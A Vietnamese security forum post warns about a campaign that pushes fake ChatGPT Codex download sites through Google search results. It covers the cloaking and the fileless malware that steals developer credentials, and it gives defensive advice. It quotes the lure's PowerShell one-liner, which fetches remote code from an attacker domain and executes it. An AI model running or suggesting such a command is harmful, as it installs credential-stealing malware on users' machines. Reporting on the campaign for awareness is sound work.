Cảnh báo: Mã độc "vô hình" núp bóng công cụ ChatGPT Codex trên Google Search

H

Heoanchayyy

Member
20/08/2025
0
7 bài viết
Cảnh báo: Mã độc "vô hình" núp bóng công cụ ChatGPT Codex trên Google Search
H
Lợi dụng làn sóng tìm kiếm các công cụ AI hỗ trợ lập trình, một chiến dịch tấn công mạng quy mô lớn đang biến Google Search thành nơi phát tán mã độc. Bằng cách thao túng kết quả tìm kiếm và sử dụng các kỹ thuật né quét bảo mật tinh vi, tin tặc đang nhắm thẳng vào giới lập trình viên nhằm chiếm đoạt mã nguồn và quyền quản trị hệ thống của doanh nghiệp.
canhbao minhhoa.png

Thủ đoạn SEO Poisoning thao túng kết quả tìm kiếm​

Khi các công cụ AI hỗ trợ lập trình như ChatGPT Codex hay DeepSeek trở thành từ khóa “hot” trên Google, cũng là lúc tin tặc nhanh chóng biến chúng thành mồi nhử cho một chiến dịch phát tán mã độc quy mô lớn. Bằng thủ đoạn SEO Poisoning kết hợp quảng cáo Google Ads, hàng loạt website giả mạo đã được đẩy lên những vị trí đầu tiên trong kết quả tìm kiếm với các cụm từ như “GPT Codex”, “ChatGPT Codex download” hay “AI coding agent CLI”, đánh thẳng vào tâm lý tin tưởng của người dùng đối với các liên kết xuất hiện trên Google.

1778139290251.png

Để tăng độ tin cậy, các website lừa đảo được dựng lại gần như nguyên bản giao diện của các hãng công nghệ lớn, từ bố cục, logo cho tới mô tả sản phẩm. Chúng sử dụng các tên miền dễ gây nhầm lẫn như codex-download[.]xyz hoặc tận dụng các nền tảng uy tín như GitHub Pages, GitLab Pages để che giấu sự bất thường. Thậm chí, nhiều trang còn xuất hiện ngay đầu kết quả tìm kiếm với nhãn “Được tài trợ”, khiến không ít người dùng lầm tưởng đây là đường dẫn chính thức.

Sau khi truy cập vào các trang này, nạn nhân sẽ được dẫn dụ bấm vào nút “Download” để tải về bộ cài đặt giả mạo hoặc làm theo hướng dẫn sao chép một đoạn lệnh và chạy trực tiếp trên PowerShell hay Terminal. Chính ở bước này, mã độc mới bắt đầu được kích hoạt trên hệ thống.​

Cơ chế "vô hình hóa" mã độc trên bộ nhớ RAM​

Sự nguy hiểm của chiến dịch này không nằm ở giao diện giả mạo, mà ẩn sâu trong chuỗi kỹ thuật né tránh phát hiện bài bản của tin tặc. Nhằm duy trì sự tồn tại của website lừa đảo trên Google và tránh các đợt càn quét từ hệ thống bảo mật tự động, tin tặc đã thiết lập bộ lọc nguồn truy cập ngay trên máy chủ. Khi các bot bảo mật hoặc chuyên gia an ninh mạng truy cập trực tiếp vào đường dẫn, hệ thống sẽ chỉ trả về một trang blog công nghệ hoàn toàn sạch sẽ, vô hại. Mã độc chỉ thực sự được kích hoạt khi máy chủ nhận diện được yêu cầu truy cập chuyển hướng từ Google thông qua chuỗi dữ liệu "google.com" trong HTTP Referer. Thủ đoạn lọc nguồn tinh vi này giúp website độc hại vượt qua các đợt rà quét tự động, từ đó kéo dài thời gian tồn tại trên trang kết quả tìm kiếm.
1778139374339.png

Khi đã vượt qua được lớp lọc nguồn, bước tiếp theo của cuộc tấn công là lợi dụng chính các công cụ quản trị hệ thống có sẵn trên Windows để thực thi mã độc. Thay vì tải xuống các tệp cài đặt thông thường vốn dễ bị trình diệt virus phát hiện, trang web giả mạo dẫn dụ người dùng sao chép và khởi chạy một dòng lệnh PowerShell duy nhất: cls; iex (iwr thecodextech.top -UseBasicParsing).Content.

Về mặt kỹ thuật, đây là một quy trình tấn công đa giai đoạn được tinh gọn trong vài ký tự. Lệnh cls đóng vai trò "xóa dấu vết" hiện trường bằng cách làm sạch màn hình console, ngay sau đó lệnh iwr (Invoke-WebRequest) sẽ âm thầm thiết lập một kết nối Internet tới máy chủ của tin tặc để lấy về các tập lệnh phá hoại. Điểm mấu chốt nằm ở tổ hợp iex (Invoke-Expression) và tham số .Content, cho phép máy tính đọc và thực thi trực tiếp nội dung mã độc ngay trên bộ nhớ RAM mà không cần ghi xuống ổ cứng.
1778139432496.png

Cơ chế này hình thành một cuộc tấn công fileless execution điển hình. Bằng cách hoạt động hoàn toàn trên bộ nhớ tạm, mã độc trở nên vô hình trước các giải pháp bảo mật truyền thống vốn chỉ tập trung quét và phân tích các tệp tin vật lý trên đĩa cứng. Điều này không chỉ giúp tin tặc qua mặt các hàng rào phòng thủ mà còn khiến việc điều tra dấu vết sau cuộc tấn công trở nên cực kỳ khó khăn, khi mọi dữ liệu độc hại sẽ tự động biến mất ngay khi máy tính khởi động lại.​

Mục tiêu giá trị cao: Mã nguồn dự án và hạ tầng doanh nghiệp​

Chiến dịch lần này nhắm thẳng vào lập trình viên và kỹ sư hệ thống, những người đang nắm quyền truy cập vào mã nguồn, máy chủ và hạ tầng cloud của doanh nghiệp. Sau khi được kích hoạt, mã độc sẽ âm thầm lục soát toàn bộ hệ thống để đánh cắp mật khẩu, cookie đăng nhập, SSH key, tài khoản GitHub và các khóa truy cập dịch vụ như AWS hay Azure.

Chỉ cần kiểm soát được máy tính của một lập trình viên, tin tặc có thể lần theo đó để xâm nhập sâu hơn vào hệ thống nội bộ doanh nghiệp. Những dữ liệu như mã nguồn dự án, thông tin quản trị hay khóa truy cập hạ tầng cloud nếu bị đánh cắp sẽ trở thành bàn đạp cho các cuộc tấn công chuỗi cung ứng trên diện rộng.

Thậm chí, chúng có thể âm thầm cài backdoor để duy trì quyền kiểm soát lâu dài, biến thiết bị thành “zombie” phục vụ các chiến dịch tấn công khác hoặc kích hoạt mã độc tống tiền nhằm mã hóa toàn bộ hệ thống doanh nghiệp.​

Khuyến nghị​

Có thể thấy, chiến dịch này không đơn thuần là giả mạo một công cụ AI cụ thể, mà là cách tin tặc biến các xu hướng công nghệ thành “mồi câu” để dẫn dụ nạn nhân. Hôm nay cái tên được lợi dụng có thể là Codex hay DeepSeek, nhưng khi một nền tảng mới nổi lên, kịch bản tương tự hoàn toàn có thể lặp lại. Điểm nguy hiểm nằm ở chỗ cuộc tấn công không nhắm vào lỗ hổng kỹ thuật phức tạp, mà khai thác trực tiếp sự tin tưởng và thói quen thao tác của người dùng kỹ thuật.

Đối với người dùng cá nhân và lập trình viên:​
  • Không sao chép và thực thi trực tiếp các lệnh PowerShell, Bash hoặc Terminal từ các nguồn không xác thực, kể cả khi chúng được ngụy trang dưới dạng hướng dẫn cài đặt công cụ AI.​
  • Kiểm tra kỹ tên miền trước khi tải phần mềm hoặc truy cập tài liệu hướng dẫn. Cần đặc biệt thận trọng với các kết quả có nhãn quảng cáo xuất hiện ở đầu Google Search.​
  • Hạn chế lưu trữ mật khẩu, token truy cập hoặc API key trực tiếp trên trình duyệt và máy làm việc cá nhân.​
Đối với doanh nghiệp và quản trị viên hệ thống:​
  • Triển khai các giải pháp EDR có khả năng giám sát hành vi tiến trình thay vì chỉ phụ thuộc vào phần mềm diệt virus quét file truyền thống.​
  • Theo dõi lưu lượng mạng để phát hiện sớm các kết nối bất thường tới máy chủ điều khiển từ xa hoặc hoạt động tải mã độc bổ sung từ Internet.​
  • Thường xuyên cập nhật hệ điều hành, trình duyệt và các bản vá bảo mật nhằm giảm nguy cơ bị khai thác sâu hơn sau khi thiết bị bị xâm nhập.​
 
Chỉnh sửa lần cuối bởi người điều hành:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Bạn phải đăng nhập hoặc đăng ký để phản hồi tại đây.
Bài viết liên quan
  • Cảnh báo: "Chợ đen" ransomware nhen nhóm, tin tặc có thể đặt hàng theo yêu cầu
  • Cảnh báo khẩn: Gần 400.000 máy tính chạy Windows trên toàn cầu đã bị nhiễm mã độc
  • Cảnh báo: Việt Nam nằm trong tầm ngắm của mã độc RustoBot
  • Cảnh báo nguy cơ từ chiến dịch ransomware Medusa và driver độc hại ABYSSWORKER
  • Dự báo: 5 mã độc nguy hiểm cần cảnh giác trong năm 2025
  • Cảnh báo lừa đảo phát tán mã độc chiếm quyền điều khiển trên Android tại Việt Nam
    • Bên trên